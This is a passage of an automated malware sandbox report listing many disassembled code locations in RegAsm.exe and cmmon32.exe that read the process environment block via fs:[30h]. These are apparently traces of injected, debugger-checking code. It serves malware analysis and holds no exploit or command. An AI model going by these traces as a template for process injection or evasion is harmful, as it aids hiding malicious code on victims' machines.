Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B961A0 mov eax, dword ptr fs:[00000030h] 9_2_02B961A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92990 mov eax, dword ptr fs:[00000030h] 9_2_02B92990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8C182 mov eax, dword ptr fs:[00000030h] 9_2_02B8C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9A185 mov eax, dword ptr fs:[00000030h] 9_2_02B9A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6B1E1 mov eax, dword ptr fs:[00000030h] 9_2_02B6B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6B1E1 mov eax, dword ptr fs:[00000030h] 9_2_02B6B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6B1E1 mov eax, dword ptr fs:[00000030h] 9_2_02B6B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BF41E8 mov eax, dword ptr fs:[00000030h] 9_2_02BF41E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C249A4 mov eax, dword ptr fs:[00000030h] 9_2_02C249A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C249A4 mov eax, dword ptr fs:[00000030h] 9_2_02C249A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C249A4 mov eax, dword ptr fs:[00000030h] 9_2_02C249A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C249A4 mov eax, dword ptr fs:[00000030h] 9_2_02C249A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9513A mov eax, dword ptr fs:[00000030h] 9_2_02B9513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9513A mov eax, dword ptr fs:[00000030h] 9_2_02B9513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B84120 mov eax, dword ptr fs:[00000030h] 9_2_02B84120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B84120 mov eax, dword ptr fs:[00000030h] 9_2_02B84120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B84120 mov eax, dword ptr fs:[00000030h] 9_2_02B84120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B84120 mov eax, dword ptr fs:[00000030h] 9_2_02B84120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B84120 mov ecx, dword ptr fs:[00000030h] 9_2_02B84120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B69100 mov eax, dword ptr fs:[00000030h] 9_2_02B69100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B69100 mov eax, dword ptr fs:[00000030h] 9_2_02B69100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B69100 mov eax, dword ptr fs:[00000030h] 9_2_02B69100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6B171 mov eax, dword ptr fs:[00000030h] 9_2_02B6B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6B171 mov eax, dword ptr fs:[00000030h] 9_2_02B6B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6C962 mov eax, dword ptr fs:[00000030h] 9_2_02B6C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8B944 mov eax, dword ptr fs:[00000030h] 9_2_02B8B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8B944 mov eax, dword ptr fs:[00000030h] 9_2_02B8B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C1FEC0 mov eax, dword ptr fs:[00000030h] 9_2_02C1FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C38ED6 mov eax, dword ptr fs:[00000030h] 9_2_02C38ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE46A7 mov eax, dword ptr fs:[00000030h] 9_2_02BE46A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFFE87 mov eax, dword ptr fs:[00000030h] 9_2_02BFFE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B776E2 mov eax, dword ptr fs:[00000030h] 9_2_02B776E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B916E0 mov ecx, dword ptr fs:[00000030h] 9_2_02B916E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C30EA5 mov eax, dword ptr fs:[00000030h] 9_2_02C30EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C30EA5 mov eax, dword ptr fs:[00000030h] 9_2_02C30EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C30EA5 mov eax, dword ptr fs:[00000030h] 9_2_02C30EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B936CC mov eax, dword ptr fs:[00000030h] 9_2_02B936CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA8EC7 mov eax, dword ptr fs:[00000030h] 9_2_02BA8EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2AE44 mov eax, dword ptr fs:[00000030h] 9_2_02C2AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2AE44 mov eax, dword ptr fs:[00000030h] 9_2_02C2AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6E620 mov eax, dword ptr fs:[00000030h] 9_2_02B6E620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9A61C mov eax, dword ptr fs:[00000030h] 9_2_02B9A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9A61C mov eax, dword ptr fs:[00000030h] 9_2_02B9A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6C600 mov eax, dword ptr fs:[00000030h] 9_2_02B6C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6C600 mov eax, dword ptr fs:[00000030h] 9_2_02B6C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6C600 mov eax, dword ptr fs:[00000030h] 9_2_02B6C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B98E00 mov eax, dword ptr fs:[00000030h] 9_2_02B98E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21608 mov eax, dword ptr fs:[00000030h] 9_2_02C21608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8AE73 mov eax, dword ptr fs:[00000030h] 9_2_02B8AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8AE73 mov eax, dword ptr fs:[00000030h] 9_2_02B8AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8AE73 mov eax, dword ptr fs:[00000030h] 9_2_02B8AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8AE73 mov eax, dword ptr fs:[00000030h] 9_2_02B8AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8AE73 mov eax, dword ptr fs:[00000030h] 9_2_02B8AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7766D mov eax, dword ptr fs:[00000030h] 9_2_02B7766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h] 9_2_02B77E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h] 9_2_02B77E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h] 9_2_02B77E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h] 9_2_02B77E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h] 9_2_02B77E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B77E41 mov eax, dword ptr fs:[00000030h] 9_2_02B77E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C1FE3F mov eax, dword ptr fs:[00000030h] 9_2_02C1FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B78794 mov eax, dword ptr fs:[00000030h] 9_2_02B78794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE7794 mov eax, dword ptr fs:[00000030h] 9_2_02BE7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE7794 mov eax, dword ptr fs:[00000030h] 9_2_02BE7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE7794 mov eax, dword ptr fs:[00000030h] 9_2_02BE7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA37F5 mov eax, dword ptr fs:[00000030h] 9_2_02BA37F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9E730 mov eax, dword ptr fs:[00000030h] 9_2_02B9E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B64F2E mov eax, dword ptr fs:[00000030h] 9_2_02B64F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B64F2E mov eax, dword ptr fs:[00000030h] 9_2_02B64F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C38F6A mov eax, dword ptr fs:[00000030h] 9_2_02C38F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8F716 mov eax, dword ptr fs:[00000030h] 9_2_02B8F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFFF10 mov eax, dword ptr fs:[00000030h] 9_2_02BFFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFFF10 mov eax, dword ptr fs:[00000030h] 9_2_02BFFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9A70E mov eax, dword ptr fs:[00000030h] 9_2_02B9A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9A70E mov eax, dword ptr fs:[00000030h] 9_2_02B9A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C3070D mov eax, dword ptr fs:[00000030h] 9_2_02C3070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C3070D mov eax, dword ptr fs:[00000030h] 9_2_02C3070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7FF60 mov eax, dword ptr fs:[00000030h] 9_2_02B7FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7EF40 mov eax, dword ptr fs:[00000030h] 9_2_02B7EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C38CD6 mov eax, dword ptr fs:[00000030h] 9_2_02C38CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7849B mov eax, dword ptr fs:[00000030h] 9_2_02B7849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C214FB mov eax, dword ptr fs:[00000030h] 9_2_02C214FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6CF0 mov eax, dword ptr fs:[00000030h] 9_2_02BE6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6CF0 mov eax, dword ptr fs:[00000030h] 9_2_02BE6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6CF0 mov eax, dword ptr fs:[00000030h] 9_2_02BE6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9BC2C mov eax, dword ptr fs:[00000030h] 9_2_02B9BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6C0A mov eax, dword ptr fs:[00000030h] 9_2_02BE6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6C0A mov eax, dword ptr fs:[00000030h] 9_2_02BE6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6C0A mov eax, dword ptr fs:[00000030h] 9_2_02BE6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6C0A mov eax, dword ptr fs:[00000030h] 9_2_02BE6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C21C06 mov eax, dword ptr fs:[00000030h] 9_2_02C21C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C3740D mov eax, dword ptr fs:[00000030h] 9_2_02C3740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C3740D mov eax, dword ptr fs:[00000030h] 9_2_02C3740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C3740D mov eax, dword ptr fs:[00000030h] 9_2_02C3740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8746D mov eax, dword ptr fs:[00000030h] 9_2_02B8746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFC450 mov eax, dword ptr fs:[00000030h] 9_2_02BFC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BFC450 mov eax, dword ptr fs:[00000030h] 9_2_02BFC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9A44B mov eax, dword ptr fs:[00000030h] 9_2_02B9A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B91DB5 mov eax, dword ptr fs:[00000030h] 9_2_02B91DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B91DB5 mov eax, dword ptr fs:[00000030h] 9_2_02B91DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B91DB5 mov eax, dword ptr fs:[00000030h] 9_2_02B91DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B935A1 mov eax, dword ptr fs:[00000030h] 9_2_02B935A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2FDE2 mov eax, dword ptr fs:[00000030h] 9_2_02C2FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2FDE2 mov eax, dword ptr fs:[00000030h] 9_2_02C2FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2FDE2 mov eax, dword ptr fs:[00000030h] 9_2_02C2FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2FDE2 mov eax, dword ptr fs:[00000030h] 9_2_02C2FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9FD9B mov eax, dword ptr fs:[00000030h] 9_2_02B9FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B9FD9B mov eax, dword ptr fs:[00000030h] 9_2_02B9FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C18DF1 mov eax, dword ptr fs:[00000030h] 9_2_02C18DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92581 mov eax, dword ptr fs:[00000030h] 9_2_02B92581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92581 mov eax, dword ptr fs:[00000030h] 9_2_02B92581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92581 mov eax, dword ptr fs:[00000030h] 9_2_02B92581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B92581 mov eax, dword ptr fs:[00000030h] 9_2_02B92581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B62D8A mov eax, dword ptr fs:[00000030h] 9_2_02B62D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B62D8A mov eax, dword ptr fs:[00000030h] 9_2_02B62D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B62D8A mov eax, dword ptr fs:[00000030h] 9_2_02B62D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B62D8A mov eax, dword ptr fs:[00000030h] 9_2_02B62D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B62D8A mov eax, dword ptr fs:[00000030h] 9_2_02B62D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7D5E0 mov eax, dword ptr fs:[00000030h] 9_2_02B7D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B7D5E0 mov eax, dword ptr fs:[00000030h] 9_2_02B7D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C305AC mov eax, dword ptr fs:[00000030h] 9_2_02C305AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C305AC mov eax, dword ptr fs:[00000030h] 9_2_02C305AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6DC9 mov eax, dword ptr fs:[00000030h] 9_2_02BE6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6DC9 mov eax, dword ptr fs:[00000030h] 9_2_02BE6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6DC9 mov eax, dword ptr fs:[00000030h] 9_2_02BE6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6DC9 mov ecx, dword ptr fs:[00000030h] 9_2_02BE6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6DC9 mov eax, dword ptr fs:[00000030h] 9_2_02BE6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE6DC9 mov eax, dword ptr fs:[00000030h] 9_2_02BE6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B94D3B mov eax, dword ptr fs:[00000030h] 9_2_02B94D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B94D3B mov eax, dword ptr fs:[00000030h] 9_2_02B94D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B94D3B mov eax, dword ptr fs:[00000030h] 9_2_02B94D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B73D34 mov eax, dword ptr fs:[00000030h] 9_2_02B73D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B6AD30 mov eax, dword ptr fs:[00000030h] 9_2_02B6AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BEA537 mov eax, dword ptr fs:[00000030h] 9_2_02BEA537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8C577 mov eax, dword ptr fs:[00000030h] 9_2_02B8C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B8C577 mov eax, dword ptr fs:[00000030h] 9_2_02B8C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02B87D50 mov eax, dword ptr fs:[00000030h] 9_2_02B87D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C38D34 mov eax, dword ptr fs:[00000030h] 9_2_02C38D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BA3D43 mov eax, dword ptr fs:[00000030h] 9_2_02BA3D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02C2E539 mov eax, dword ptr fs:[00000030h] 9_2_02C2E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_02BE3540 mov eax, dword ptr fs:[00000030h] 9_2_02BE3540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0478746D mov eax, dword ptr fs:[00000030h] 23_2_0478746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FC450 mov eax, dword ptr fs:[00000030h] 23_2_047FC450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047FC450 mov eax, dword ptr fs:[00000030h] 23_2_047FC450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479A44B mov eax, dword ptr fs:[00000030h] 23_2_0479A44B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04838CD6 mov eax, dword ptr fs:[00000030h] 23_2_04838CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_0479BC2C mov eax, dword ptr fs:[00000030h] 23_2_0479BC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6C0A mov eax, dword ptr fs:[00000030h] 23_2_047E6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6C0A mov eax, dword ptr fs:[00000030h] 23_2_047E6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6C0A mov eax, dword ptr fs:[00000030h] 23_2_047E6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_047E6C0A mov eax, dword ptr fs:[00000030h] 23_2_047E6C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_048214FB mov eax, dword ptr fs:[00000030h] 23_2_048214FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 23_2_04821C06 mov eax, dword ptr fs:[00000030h] 23_2_04821C06
